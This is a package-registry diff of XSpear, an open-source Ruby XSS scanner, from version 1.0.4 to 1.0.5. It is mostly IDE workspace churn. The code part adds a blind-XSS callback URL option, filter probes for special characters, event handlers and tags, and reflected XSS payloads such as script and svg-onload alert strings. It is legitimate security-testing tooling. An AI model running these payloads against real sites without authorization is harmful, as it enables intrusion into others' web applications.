XSpear 1.0.4 → 1.0.5
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- checksums.yaml +4 -4
- data/.idea/workspace.xml +73 -53
- data/exe/XSpear +6 -2
- data/lib/XSpear/XSpearRepoter.rb +42 -2
- data/lib/XSpear/version.rb +1 -1
- data/lib/XSpear.rb +65 -24
- metadata +2 -3
- data/XSpear-1.0.3.gem +0 -0
checksums.yaml
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
---
|
|
2
2
|
SHA256:
|
|
3
|
-
metadata.gz:
|
|
4
|
-
data.tar.gz:
|
|
3
|
+
metadata.gz: b09dcb74e1734799658762e143a9faf16db70df6200de80ca2334cdbfc8c5d08
|
|
4
|
+
data.tar.gz: dd840605d1fd1261b672f5bf27de9f648a924abeb685f6bea2334a4f2f3f3cc1
|
|
5
5
|
SHA512:
|
|
6
|
-
metadata.gz:
|
|
7
|
-
data.tar.gz:
|
|
6
|
+
metadata.gz: c29c155ff0ab0667c2ff4deab4618eaace8dae3410e159b141187f1cd13040679b6f84597ff250fe3e99ee740e8676dbaeccc7df405f6ccf19026441f9a928cb
|
|
7
|
+
data.tar.gz: 568f793d58fa31180fa494aefa54557b2e927ee3c240a5fb789502bd1c43730c24f22849eb2ac6110daccb97a882f845a69b1aea723848b3561eb46a9e03d7af
|
data/.idea/workspace.xml
CHANGED
|
@@ -2,7 +2,11 @@
|
|
|
2
2
|
<project version="4">
|
|
3
3
|
<component name="ChangeListManager">
|
|
4
4
|
<list default="true" id="4ee2e581-45d7-4c90-b6a1-e92e4b5829dd" name="Default Changelist" comment="">
|
|
5
|
+
<change beforePath="$PROJECT_DIR$/.idea/workspace.xml" beforeDir="false" afterPath="$PROJECT_DIR$/.idea/workspace.xml" afterDir="false" />
|
|
5
6
|
<change beforePath="$PROJECT_DIR$/exe/XSpear" beforeDir="false" afterPath="$PROJECT_DIR$/exe/XSpear" afterDir="false" />
|
|
7
|
+
<change beforePath="$PROJECT_DIR$/lib/XSpear.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear.rb" afterDir="false" />
|
|
8
|
+
<change beforePath="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" afterDir="false" />
|
|
9
|
+
<change beforePath="$PROJECT_DIR$/lib/XSpear/version.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear/version.rb" afterDir="false" />
|
|
6
10
|
</list>
|
|
7
11
|
<option name="EXCLUDED_CONVERTED_TO_IGNORED" value="true" />
|
|
8
12
|
<option name="SHOW_DIALOG" value="false" />
|
|
@@ -15,11 +19,11 @@
|
|
|
15
19
|
</component>
|
|
16
20
|
<component name="FileEditorManager">
|
|
17
21
|
<leaf SIDE_TABS_SIZE_LIMIT_KEY="300">
|
|
18
|
-
<file pinned="false" current-in-tab="
|
|
22
|
+
<file pinned="false" current-in-tab="false">
|
|
19
23
|
<entry file="file://$PROJECT_DIR$/exe/XSpear">
|
|
20
24
|
<provider selected="true" editor-type-id="text-editor">
|
|
21
|
-
<state relative-caret-position="
|
|
22
|
-
<caret line="
|
|
25
|
+
<state relative-caret-position="496">
|
|
26
|
+
<caret line="35" column="117" selection-start-line="35" selection-start-column="117" selection-end-line="35" selection-end-column="117" />
|
|
23
27
|
</state>
|
|
24
28
|
</provider>
|
|
25
29
|
</entry>
|
|
@@ -39,8 +43,8 @@
|
|
|
39
43
|
<file pinned="false" current-in-tab="false">
|
|
40
44
|
<entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
|
|
41
45
|
<provider selected="true" editor-type-id="text-editor">
|
|
42
|
-
<state relative-caret-position="
|
|
43
|
-
<caret line="
|
|
46
|
+
<state relative-caret-position="528">
|
|
47
|
+
<caret line="309" column="94" lean-forward="true" selection-start-line="309" selection-start-column="94" selection-end-line="309" selection-end-column="94" />
|
|
44
48
|
</state>
|
|
45
49
|
</provider>
|
|
46
50
|
</entry>
|
|
@@ -48,8 +52,8 @@
|
|
|
48
52
|
<file pinned="false" current-in-tab="false">
|
|
49
53
|
<entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
|
|
50
54
|
<provider selected="true" editor-type-id="text-editor">
|
|
51
|
-
<state relative-caret-position="
|
|
52
|
-
<caret line="
|
|
55
|
+
<state relative-caret-position="586">
|
|
56
|
+
<caret line="107" column="36" lean-forward="true" selection-start-line="107" selection-start-column="36" selection-end-line="107" selection-end-column="36" />
|
|
53
57
|
</state>
|
|
54
58
|
</provider>
|
|
55
59
|
</entry>
|
|
@@ -67,12 +71,12 @@
|
|
|
67
71
|
<entry file="file://$PROJECT_DIR$/lib/XSpear/log.rb">
|
|
68
72
|
<provider selected="true" editor-type-id="text-editor">
|
|
69
73
|
<state relative-caret-position="195">
|
|
70
|
-
<caret line="13" column="19" selection-start-line="13" selection-start-column="
|
|
74
|
+
<caret line="13" column="19" lean-forward="true" selection-start-line="13" selection-start-column="19" selection-end-line="13" selection-end-column="19" />
|
|
71
75
|
</state>
|
|
72
76
|
</provider>
|
|
73
77
|
</entry>
|
|
74
78
|
</file>
|
|
75
|
-
<file pinned="false" current-in-tab="
|
|
79
|
+
<file pinned="false" current-in-tab="true">
|
|
76
80
|
<entry file="file://$PROJECT_DIR$/lib/XSpear/version.rb">
|
|
77
81
|
<provider selected="true" editor-type-id="text-editor">
|
|
78
82
|
<state relative-caret-position="15">
|
|
@@ -84,7 +88,7 @@
|
|
|
84
88
|
<file pinned="false" current-in-tab="false">
|
|
85
89
|
<entry file="file://$PROJECT_DIR$/XSpear.gemspec">
|
|
86
90
|
<provider selected="true" editor-type-id="text-editor">
|
|
87
|
-
<state relative-caret-position="
|
|
91
|
+
<state relative-caret-position="105">
|
|
88
92
|
<caret line="7" column="23" selection-start-line="7" selection-start-column="23" selection-end-line="7" selection-end-column="38" />
|
|
89
93
|
</state>
|
|
90
94
|
</provider>
|
|
@@ -109,19 +113,19 @@
|
|
|
109
113
|
<option name="CHANGED_PATHS">
|
|
110
114
|
<list>
|
|
111
115
|
<option value="$PROJECT_DIR$/lib/XSpear/log.rb" />
|
|
112
|
-
<option value="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" />
|
|
113
116
|
<option value="$PROJECT_DIR$/XSpear.gemspec" />
|
|
114
117
|
<option value="$PROJECT_DIR$/README.md" />
|
|
115
118
|
<option value="$PROJECT_DIR$/lib/XSpear/banner.rb" />
|
|
116
|
-
<option value="$PROJECT_DIR$/lib/XSpear/version.rb" />
|
|
117
|
-
<option value="$PROJECT_DIR$/lib/XSpear.rb" />
|
|
118
119
|
<option value="$PROJECT_DIR$/exe/XSpear" />
|
|
120
|
+
<option value="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" />
|
|
121
|
+
<option value="$PROJECT_DIR$/lib/XSpear.rb" />
|
|
122
|
+
<option value="$PROJECT_DIR$/lib/XSpear/version.rb" />
|
|
119
123
|
</list>
|
|
120
124
|
</option>
|
|
121
125
|
</component>
|
|
122
|
-
<component name="ProjectFrameBounds"
|
|
123
|
-
<option name="x" value="-
|
|
124
|
-
<option name="y" value="-
|
|
126
|
+
<component name="ProjectFrameBounds">
|
|
127
|
+
<option name="x" value="-1920" />
|
|
128
|
+
<option name="y" value="-620" />
|
|
125
129
|
<option name="width" value="1920" />
|
|
126
130
|
<option name="height" value="1057" />
|
|
127
131
|
</component>
|
|
@@ -133,7 +137,6 @@
|
|
|
133
137
|
<foldersAlwaysOnTop value="true" />
|
|
134
138
|
</navigator>
|
|
135
139
|
<panes>
|
|
136
|
-
<pane id="Scope" />
|
|
137
140
|
<pane id="ProjectPane">
|
|
138
141
|
<subPane>
|
|
139
142
|
<expand>
|
|
@@ -171,6 +174,7 @@
|
|
|
171
174
|
<select />
|
|
172
175
|
</subPane>
|
|
173
176
|
</pane>
|
|
177
|
+
<pane id="Scope" />
|
|
174
178
|
</panes>
|
|
175
179
|
</component>
|
|
176
180
|
<component name="PropertiesComponent">
|
|
@@ -228,7 +232,8 @@
|
|
|
228
232
|
<option name="presentableId" value="Default" />
|
|
229
233
|
<updated>1562942814778</updated>
|
|
230
234
|
<workItem from="1562942816004" duration="15337000" />
|
|
231
|
-
<workItem from="1563638656518" duration="
|
|
235
|
+
<workItem from="1563638656518" duration="4985000" />
|
|
236
|
+
<workItem from="1563809961097" duration="3592000" />
|
|
232
237
|
</task>
|
|
233
238
|
<task id="LOCAL-00001" summary="init update">
|
|
234
239
|
<created>1562945899597</created>
|
|
@@ -405,20 +410,33 @@
|
|
|
405
410
|
<option name="project" value="LOCAL" />
|
|
406
411
|
<updated>1563648949262</updated>
|
|
407
412
|
</task>
|
|
408
|
-
<
|
|
413
|
+
<task id="LOCAL-00026" summary="verbose가 1일 떄 배너 출력되지 않도록 수정">
|
|
414
|
+
<created>1563649920055</created>
|
|
415
|
+
<option name="number" value="00026" />
|
|
416
|
+
<option name="presentableId" value="LOCAL-00026" />
|
|
417
|
+
<option name="project" value="LOCAL" />
|
|
418
|
+
<updated>1563649920055</updated>
|
|
419
|
+
</task>
|
|
420
|
+
<task id="LOCAL-00027" summary="verbose가 1일 떄 배너 출력되지 않도록 수정">
|
|
421
|
+
<created>1563649975625</created>
|
|
422
|
+
<option name="number" value="00027" />
|
|
423
|
+
<option name="presentableId" value="LOCAL-00027" />
|
|
424
|
+
<option name="project" value="LOCAL" />
|
|
425
|
+
<updated>1563649975625</updated>
|
|
426
|
+
</task>
|
|
427
|
+
<option name="localTasksCounter" value="28" />
|
|
409
428
|
<servers />
|
|
410
429
|
</component>
|
|
411
430
|
<component name="TimeTrackingManager">
|
|
412
|
-
<option name="totallyTimeSpent" value="
|
|
431
|
+
<option name="totallyTimeSpent" value="23914000" />
|
|
413
432
|
</component>
|
|
414
433
|
<component name="ToolWindowManager">
|
|
415
434
|
<frame x="-1920" y="-620" width="1920" height="1057" extended-state="6" />
|
|
416
435
|
<editor active="true" />
|
|
417
436
|
<layout>
|
|
418
|
-
<window_info active="true" content_ui="combo" id="Project" order="0" visible="true" weight="0.
|
|
437
|
+
<window_info active="true" content_ui="combo" id="Project" order="0" visible="true" weight="0.16240682" />
|
|
419
438
|
<window_info id="Structure" order="1" side_tool="true" weight="0.25" />
|
|
420
439
|
<window_info id="Favorites" order="2" side_tool="true" />
|
|
421
|
-
<window_info anchor="bottom" id="Messages" weight="0.32953367" />
|
|
422
440
|
<window_info anchor="bottom" id="Message" order="0" />
|
|
423
441
|
<window_info anchor="bottom" id="Find" order="1" />
|
|
424
442
|
<window_info anchor="bottom" id="Run" order="2" weight="0.32953367" />
|
|
@@ -431,6 +449,7 @@
|
|
|
431
449
|
<window_info anchor="bottom" id="Version Control" order="9" />
|
|
432
450
|
<window_info anchor="bottom" id="Terminal" order="10" visible="true" weight="0.29637307" />
|
|
433
451
|
<window_info anchor="bottom" id="Event Log" order="11" side_tool="true" />
|
|
452
|
+
<window_info anchor="bottom" id="Messages" order="12" weight="0.32953367" />
|
|
434
453
|
<window_info anchor="right" id="Commander" internal_type="SLIDING" order="0" type="SLIDING" weight="0.4" />
|
|
435
454
|
<window_info anchor="right" id="Ant Build" order="1" weight="0.25" />
|
|
436
455
|
<window_info anchor="right" content_ui="combo" id="Hierarchy" order="2" weight="0.25" />
|
|
@@ -457,7 +476,8 @@
|
|
|
457
476
|
<MESSAGE value="Add show version & edit help, version in banner" />
|
|
458
477
|
<MESSAGE value="Edit version , release 1.0.2" />
|
|
459
478
|
<MESSAGE value="Add EventHandler Test logic (1.0.3), edit description on report" />
|
|
460
|
-
<
|
|
479
|
+
<MESSAGE value="verbose가 1일 떄 배너 출력되지 않도록 수정" />
|
|
480
|
+
<option name="LAST_COMMIT_MESSAGE" value="verbose가 1일 떄 배너 출력되지 않도록 수정" />
|
|
461
481
|
</component>
|
|
462
482
|
<component name="editorHistoryManager">
|
|
463
483
|
<entry file="file://$USER_HOME$/.rvm/gems/ruby-2.4.6/gems/bundler-2.0.1/lib/bundler/rubygems_integration.rb">
|
|
@@ -473,19 +493,6 @@
|
|
|
473
493
|
<entry file="file://$PROJECT_DIR$/bin/setup">
|
|
474
494
|
<provider selected="true" editor-type-id="text-editor" />
|
|
475
495
|
</entry>
|
|
476
|
-
<entry file="file://$PROJECT_DIR$/lib/XSpear/log.rb">
|
|
477
|
-
<provider selected="true" editor-type-id="text-editor">
|
|
478
|
-
<state relative-caret-position="195">
|
|
479
|
-
<caret line="13" column="19" selection-start-line="13" selection-start-column="11" selection-end-line="13" selection-end-column="19" />
|
|
480
|
-
</state>
|
|
481
|
-
</provider>
|
|
482
|
-
</entry>
|
|
483
|
-
<entry file="file:///usr/local/bin/rake">
|
|
484
|
-
<provider selected="true" editor-type-id="text-editor" />
|
|
485
|
-
</entry>
|
|
486
|
-
<entry file="file://$PROJECT_DIR$/Rakefile">
|
|
487
|
-
<provider selected="true" editor-type-id="text-editor" />
|
|
488
|
-
</entry>
|
|
489
496
|
<entry file="file://$PROJECT_DIR$/README.md">
|
|
490
497
|
<provider selected="true" editor-type-id="split-provider[text-editor;markdown-preview-editor]">
|
|
491
498
|
<state split_layout="SPLIT">
|
|
@@ -496,45 +503,58 @@
|
|
|
496
503
|
</state>
|
|
497
504
|
</provider>
|
|
498
505
|
</entry>
|
|
499
|
-
<entry file="file://$PROJECT_DIR$/XSpear.
|
|
506
|
+
<entry file="file://$PROJECT_DIR$/lib/XSpear/banner.rb">
|
|
500
507
|
<provider selected="true" editor-type-id="text-editor">
|
|
501
|
-
<state relative-caret-position="
|
|
502
|
-
<caret line="
|
|
508
|
+
<state relative-caret-position="180">
|
|
509
|
+
<caret line="12" column="69" selection-start-line="12" selection-start-column="69" selection-end-line="12" selection-end-column="69" />
|
|
503
510
|
</state>
|
|
504
511
|
</provider>
|
|
505
512
|
</entry>
|
|
506
|
-
<entry file="file://$PROJECT_DIR$/
|
|
513
|
+
<entry file="file://$PROJECT_DIR$/Rakefile">
|
|
514
|
+
<provider selected="true" editor-type-id="text-editor" />
|
|
515
|
+
</entry>
|
|
516
|
+
<entry file="file:///usr/local/bin/rake">
|
|
517
|
+
<provider selected="true" editor-type-id="text-editor" />
|
|
518
|
+
</entry>
|
|
519
|
+
<entry file="file://$PROJECT_DIR$/exe/XSpear">
|
|
507
520
|
<provider selected="true" editor-type-id="text-editor">
|
|
508
|
-
<state relative-caret-position="
|
|
509
|
-
<caret line="
|
|
521
|
+
<state relative-caret-position="496">
|
|
522
|
+
<caret line="35" column="117" selection-start-line="35" selection-start-column="117" selection-end-line="35" selection-end-column="117" />
|
|
510
523
|
</state>
|
|
511
524
|
</provider>
|
|
512
525
|
</entry>
|
|
513
|
-
<entry file="file://$PROJECT_DIR$/lib/XSpear/
|
|
526
|
+
<entry file="file://$PROJECT_DIR$/lib/XSpear/log.rb">
|
|
514
527
|
<provider selected="true" editor-type-id="text-editor">
|
|
515
|
-
<state relative-caret-position="
|
|
516
|
-
<caret line="13" lean-forward="true" selection-start-line="13" selection-end-line="13" />
|
|
528
|
+
<state relative-caret-position="195">
|
|
529
|
+
<caret line="13" column="19" lean-forward="true" selection-start-line="13" selection-start-column="19" selection-end-line="13" selection-end-column="19" />
|
|
517
530
|
</state>
|
|
518
531
|
</provider>
|
|
519
532
|
</entry>
|
|
520
|
-
<entry file="file://$PROJECT_DIR$/lib/XSpear/
|
|
533
|
+
<entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
|
|
521
534
|
<provider selected="true" editor-type-id="text-editor">
|
|
522
|
-
<state relative-caret-position="
|
|
523
|
-
<caret line="
|
|
535
|
+
<state relative-caret-position="586">
|
|
536
|
+
<caret line="107" column="36" lean-forward="true" selection-start-line="107" selection-start-column="36" selection-end-line="107" selection-end-column="36" />
|
|
524
537
|
</state>
|
|
525
538
|
</provider>
|
|
526
539
|
</entry>
|
|
527
540
|
<entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
|
|
528
541
|
<provider selected="true" editor-type-id="text-editor">
|
|
529
|
-
<state relative-caret-position="
|
|
530
|
-
<caret line="
|
|
542
|
+
<state relative-caret-position="528">
|
|
543
|
+
<caret line="309" column="94" lean-forward="true" selection-start-line="309" selection-start-column="94" selection-end-line="309" selection-end-column="94" />
|
|
531
544
|
</state>
|
|
532
545
|
</provider>
|
|
533
546
|
</entry>
|
|
534
|
-
<entry file="file://$PROJECT_DIR$/
|
|
547
|
+
<entry file="file://$PROJECT_DIR$/XSpear.gemspec">
|
|
535
548
|
<provider selected="true" editor-type-id="text-editor">
|
|
536
|
-
<state relative-caret-position="
|
|
537
|
-
<caret line="
|
|
549
|
+
<state relative-caret-position="105">
|
|
550
|
+
<caret line="7" column="23" selection-start-line="7" selection-start-column="23" selection-end-line="7" selection-end-column="38" />
|
|
551
|
+
</state>
|
|
552
|
+
</provider>
|
|
553
|
+
</entry>
|
|
554
|
+
<entry file="file://$PROJECT_DIR$/lib/XSpear/version.rb">
|
|
555
|
+
<provider selected="true" editor-type-id="text-editor">
|
|
556
|
+
<state relative-caret-position="15">
|
|
557
|
+
<caret line="1" column="18" selection-start-line="1" selection-start-column="18" selection-end-line="1" selection-end-column="18" />
|
|
538
558
|
</state>
|
|
539
559
|
</provider>
|
|
540
560
|
</entry>
|
data/exe/XSpear
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
#!/usr/bin/env ruby
|
|
2
2
|
|
|
3
3
|
require "XSpear"
|
|
4
|
-
Options = Struct.new(:url, :data, :headers, :params, :thread, :verbose, :output)
|
|
4
|
+
Options = Struct.new(:url, :data, :headers, :params, :thread, :verbose, :output, :blind)
|
|
5
5
|
class Parser
|
|
6
6
|
def self.parse(options)
|
|
7
7
|
args = Options.new('xspear')
|
|
@@ -33,6 +33,10 @@ class Parser
|
|
|
33
33
|
args.params = n
|
|
34
34
|
end
|
|
35
35
|
|
|
36
|
+
opts.on('-b', '--BLIND=URL', '[optional] Add vector of Blind XSS',' + with XSS Hunter, ezXSS, HBXSS, etc...',' + e.g : -b https://hahwul.xss.ht') do |n|
|
|
37
|
+
args.blind = n
|
|
38
|
+
end
|
|
39
|
+
|
|
36
40
|
opts.on('-t', '--threads=NUMBER', '[optional] thread , default: 10') do |n|
|
|
37
41
|
args.thread = n
|
|
38
42
|
end
|
|
@@ -78,5 +82,5 @@ options.verbose = 2 unless options.verbose
|
|
|
78
82
|
if options.verbose.to_i != 1
|
|
79
83
|
banner
|
|
80
84
|
end
|
|
81
|
-
s = XspearScan.new options.url, options.data, options.headers, options.params, options.thread.to_i, options.output, options.verbose
|
|
85
|
+
s = XspearScan.new options.url, options.data, options.headers, options.params, options.thread.to_i, options.output, options.verbose, options.blind
|
|
82
86
|
s.run
|
data/lib/XSpear/XSpearRepoter.rb
CHANGED
|
@@ -19,6 +19,7 @@ class XspearRepoter
|
|
|
19
19
|
@endtime = nil
|
|
20
20
|
@issue = []
|
|
21
21
|
@query = []
|
|
22
|
+
@filtered_objects = {}
|
|
22
23
|
# type : i,v,l,m,h
|
|
23
24
|
# param : paramter
|
|
24
25
|
# type :
|
|
@@ -29,6 +30,13 @@ class XspearRepoter
|
|
|
29
30
|
# callback
|
|
30
31
|
end
|
|
31
32
|
|
|
33
|
+
def add_issue_first(type, issue, param, payload, pattern, description)
|
|
34
|
+
rtype = {"i"=>"INFO","v"=>"VULN","l"=>"LOW","m"=>"MIDUM","h"=>"HIGH"}
|
|
35
|
+
rissue = {"f"=>"FILERD RULE","r"=>"REFLECTED","x"=>"XSS","s"=>"STATIC ANALYSIS","d"=>"DYNAMIC ANALYSIS"}
|
|
36
|
+
@issue.insert(0,["-", rtype[type], rissue[issue], param, pattern, description])
|
|
37
|
+
@query.push payload
|
|
38
|
+
end
|
|
39
|
+
|
|
32
40
|
def add_issue(type, issue, param, payload, pattern, description)
|
|
33
41
|
rtype = {"i"=>"INFO","v"=>"VULN","l"=>"LOW","m"=>"MIDUM","h"=>"HIGH"}
|
|
34
42
|
rissue = {"f"=>"FILERD RULE","r"=>"REFLECTED","x"=>"XSS","s"=>"STATIC ANALYSIS","d"=>"DYNAMIC ANALYSIS"}
|
|
@@ -36,6 +44,9 @@ class XspearRepoter
|
|
|
36
44
|
@query.push payload
|
|
37
45
|
end
|
|
38
46
|
|
|
47
|
+
def set_filtered f
|
|
48
|
+
@filtered_objects = f
|
|
49
|
+
end
|
|
39
50
|
def set_endtime
|
|
40
51
|
@endtime = Time.now
|
|
41
52
|
end
|
|
@@ -58,13 +69,42 @@ class XspearRepoter
|
|
|
58
69
|
def to_html; end
|
|
59
70
|
|
|
60
71
|
def to_cli
|
|
72
|
+
rurl = ""
|
|
73
|
+
if @url.length > 66
|
|
74
|
+
rurl = @url[0..66]+"... (snip)"
|
|
75
|
+
else
|
|
76
|
+
rurl = @url
|
|
77
|
+
end
|
|
61
78
|
table = Terminal::Table.new
|
|
62
|
-
table.title = "[ XSpear report ]\n#{
|
|
79
|
+
table.title = "[ XSpear report ]".red+"\n#{rurl}\n#{@starttime} ~ #{@endtime} Found #{@issue.length} issues."
|
|
63
80
|
table.headings = ['NO','TYPE','ISSUE','PARAM','PAYLOAD','DESCRIPTION']
|
|
64
81
|
table.rows = @issue
|
|
65
82
|
#table.style = {:width => 80}
|
|
66
83
|
puts table
|
|
67
|
-
puts "<
|
|
84
|
+
puts "< Not Filtered >".yellow
|
|
85
|
+
@filtered_objects.each do |key, value|
|
|
86
|
+
eh = []
|
|
87
|
+
tag = []
|
|
88
|
+
sc = []
|
|
89
|
+
puts "[#{key}]".blue+" param"
|
|
90
|
+
value.each do |n|
|
|
91
|
+
if n.include? "=64"
|
|
92
|
+
# eh
|
|
93
|
+
eh.push n.chomp("=64")
|
|
94
|
+
elsif n.include? "xsp<"
|
|
95
|
+
# tag
|
|
96
|
+
n = n.sub("xsp<","")
|
|
97
|
+
tag.push n.chomp(">")
|
|
98
|
+
else
|
|
99
|
+
# sc
|
|
100
|
+
sc.push n.sub("XsPeaR","")
|
|
101
|
+
end
|
|
102
|
+
end
|
|
103
|
+
puts " + Special Char: ".green+"#{sc.map(&:inspect).join(',').gsub('"',"")}"
|
|
104
|
+
puts " + Event Handler: ".green+"#{eh.map(&:inspect).join(',')}"
|
|
105
|
+
puts " + HTML Tag: ".green+"#{tag.map(&:inspect).join(',')}"
|
|
106
|
+
end
|
|
107
|
+
puts "< Raw Query >".yellow
|
|
68
108
|
@query.each_with_index do |q, i|
|
|
69
109
|
puts "[#{i}] "+@url+"?"+q
|
|
70
110
|
end
|
data/lib/XSpear/version.rb
CHANGED
data/lib/XSpear.rb
CHANGED
|
@@ -13,7 +13,7 @@ module XSpear
|
|
|
13
13
|
end
|
|
14
14
|
|
|
15
15
|
class XspearScan
|
|
16
|
-
def initialize(url, data, headers, params, thread, output, verbose)
|
|
16
|
+
def initialize(url, data, headers, params, thread, output, verbose, blind)
|
|
17
17
|
@url = url
|
|
18
18
|
@data = data
|
|
19
19
|
@headers = headers
|
|
@@ -25,7 +25,9 @@ class XspearScan
|
|
|
25
25
|
@thread = thread
|
|
26
26
|
@output = output
|
|
27
27
|
@verbose = verbose
|
|
28
|
+
@blind_url = blind
|
|
28
29
|
@report = XspearRepoter.new @url, Time.now
|
|
30
|
+
@filtered_objects = {}
|
|
29
31
|
end
|
|
30
32
|
|
|
31
33
|
class ScanCallbackFunc
|
|
@@ -59,6 +61,17 @@ class XspearScan
|
|
|
59
61
|
end
|
|
60
62
|
end
|
|
61
63
|
|
|
64
|
+
class CallbackNotAdded < ScanCallbackFunc
|
|
65
|
+
def run
|
|
66
|
+
if @response.body.include? @query
|
|
67
|
+
log("i","reflected #{@query}")
|
|
68
|
+
[false, true]
|
|
69
|
+
else
|
|
70
|
+
[false, false]
|
|
71
|
+
end
|
|
72
|
+
end
|
|
73
|
+
end
|
|
74
|
+
|
|
62
75
|
class CallbackErrorPatternMatch < ScanCallbackFunc
|
|
63
76
|
def run
|
|
64
77
|
info = "Found"
|
|
@@ -233,36 +246,53 @@ class XspearScan
|
|
|
233
246
|
'onUnload',
|
|
234
247
|
'onURLFlip'
|
|
235
248
|
]
|
|
249
|
+
tags = [
|
|
250
|
+
"script",
|
|
251
|
+
"iframe"
|
|
252
|
+
]
|
|
253
|
+
special_chars =[
|
|
254
|
+
">",
|
|
255
|
+
"<",
|
|
256
|
+
'"',
|
|
257
|
+
"'",
|
|
258
|
+
"`",
|
|
259
|
+
";",
|
|
260
|
+
"|",
|
|
261
|
+
"(",
|
|
262
|
+
")",
|
|
263
|
+
"{",
|
|
264
|
+
"}",
|
|
265
|
+
"[",
|
|
266
|
+
"]",
|
|
267
|
+
":",
|
|
268
|
+
".",
|
|
269
|
+
",",
|
|
270
|
+
"+",
|
|
271
|
+
"-",
|
|
272
|
+
"=",
|
|
273
|
+
"$"
|
|
274
|
+
]
|
|
236
275
|
|
|
237
276
|
log('s', 'creating a test query.')
|
|
238
277
|
r.push makeQueryPattern('d', 'XsPeaR"', 'XsPeaR"', 'i', "Found SQL Error Pattern", CallbackErrorPatternMatch)
|
|
239
278
|
r.push makeQueryPattern('r', 'rEfe6', 'rEfe6', 'i', 'reflected parameter', CallbackStringMatch)
|
|
240
|
-
# Check Special
|
|
241
|
-
|
|
242
|
-
|
|
243
|
-
|
|
244
|
-
|
|
245
|
-
r.push makeQueryPattern('f', "XsPeaR`", "XsPeaR`", 'i', "not filtered "+"`".blue, CallbackStringMatch)
|
|
246
|
-
r.push makeQueryPattern('f', 'XsPeaR;', 'XsPeaR;', 'i', "not filtered "+";".blue, CallbackStringMatch)
|
|
247
|
-
r.push makeQueryPattern('f', 'XsPeaR|', 'XsPeaR|', 'i', "not filtered "+"|".blue, CallbackStringMatch)
|
|
248
|
-
r.push makeQueryPattern('f', 'XsPeaR(', 'XsPeaR(', 'i', "not filtered "+"(".blue, CallbackStringMatch)
|
|
249
|
-
r.push makeQueryPattern('f', 'XsPeaR)', 'XsPeaR)', 'i', "not filtered "+")".blue, CallbackStringMatch)
|
|
250
|
-
r.push makeQueryPattern('f', 'XsPeaR{', 'XsPeaR{', 'i', "not filtered "+"{".blue, CallbackStringMatch)
|
|
251
|
-
r.push makeQueryPattern('f', 'XsPeaR}', 'XsPeaR}', 'i', "not filtered "+"}".blue, CallbackStringMatch)
|
|
252
|
-
r.push makeQueryPattern('f', 'XsPeaR[', 'XsPeaR[', 'i', "not filtered "+"[".blue, CallbackStringMatch)
|
|
253
|
-
r.push makeQueryPattern('f', 'XsPeaR]', 'XsPeaR]', 'i', "not filtered "+"]".blue, CallbackStringMatch)
|
|
254
|
-
r.push makeQueryPattern('f', 'XsPeaR:', 'XsPeaR:', 'i', "not filtered "+":".blue, CallbackStringMatch)
|
|
255
|
-
r.push makeQueryPattern('f', 'XsPeaR.', 'XsPeaR.', 'i', "not filtered "+".".blue, CallbackStringMatch)
|
|
256
|
-
r.push makeQueryPattern('f', 'XsPeaR,', 'XsPeaR,', 'i', "not filtered "+",".blue, CallbackStringMatch)
|
|
257
|
-
r.push makeQueryPattern('f', 'XsPeaR+', 'XsPeaR+', 'i', "not filtered "+"+".blue, CallbackStringMatch)
|
|
258
|
-
r.push makeQueryPattern('f', 'XsPeaR-', 'XsPeaR-', 'i', "not filtered "+"-".blue, CallbackStringMatch)
|
|
259
|
-
r.push makeQueryPattern('f', 'XsPeaR=', 'XsPeaR=', 'i', "not filtered "+"=".blue, CallbackStringMatch)
|
|
260
|
-
r.push makeQueryPattern('f', 'XsPeaR$', 'XsPeaR$', 'i', "not filtered "+"$".blue, CallbackStringMatch)
|
|
279
|
+
# Check Special Char
|
|
280
|
+
special_chars.each do |sc|
|
|
281
|
+
r.push makeQueryPattern('f', "XsPeaR#{sc}>", "XsPeaR#{sc}", 'i', "not filtered "+"#{sc}".blue, CallbackNotAdded)
|
|
282
|
+
end
|
|
283
|
+
|
|
261
284
|
# Check Event Handler
|
|
262
|
-
r.push makeQueryPattern('f', '
|
|
285
|
+
r.push makeQueryPattern('f', '\"><xspear onhwul=64>', 'onhwul=64', 'i', "not filtered event handler "+"on{any} pattern".blue, CallbackStringMatch)
|
|
263
286
|
event_handler.each do |ev|
|
|
264
|
-
r.push makeQueryPattern('f', "\"<xspear #{ev}=64>", "#{ev}=64", 'i', "not filtered event handler "+"#{ev}=64".blue,
|
|
287
|
+
r.push makeQueryPattern('f', "\"<xspear #{ev}=64>", "#{ev}=64", 'i', "not filtered event handler "+"#{ev}=64".blue, CallbackNotAdded)
|
|
265
288
|
end
|
|
289
|
+
|
|
290
|
+
# Check HTML Tag
|
|
291
|
+
tags.each do |tag|
|
|
292
|
+
r.push makeQueryPattern('f', "\">xsp<#{tag}>", "xsp<#{tag}>", 'i', "not filtered "+"<#{tag}>".blue, CallbackNotAdded)
|
|
293
|
+
end
|
|
294
|
+
|
|
295
|
+
# Check Common XSS Payloads
|
|
266
296
|
r.push makeQueryPattern('x', '"><script>alert(45)</script>', '<script>alert(45)</script>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
|
|
267
297
|
r.push makeQueryPattern('x', '<svg/onload=alert(45)>', '<svg/onload=alert(45)>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
|
|
268
298
|
r.push makeQueryPattern('x', '<img/src onerror=alert(45)>', '<img/src onerror=alert(45)>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
|
|
@@ -273,6 +303,13 @@ class XspearScan
|
|
|
273
303
|
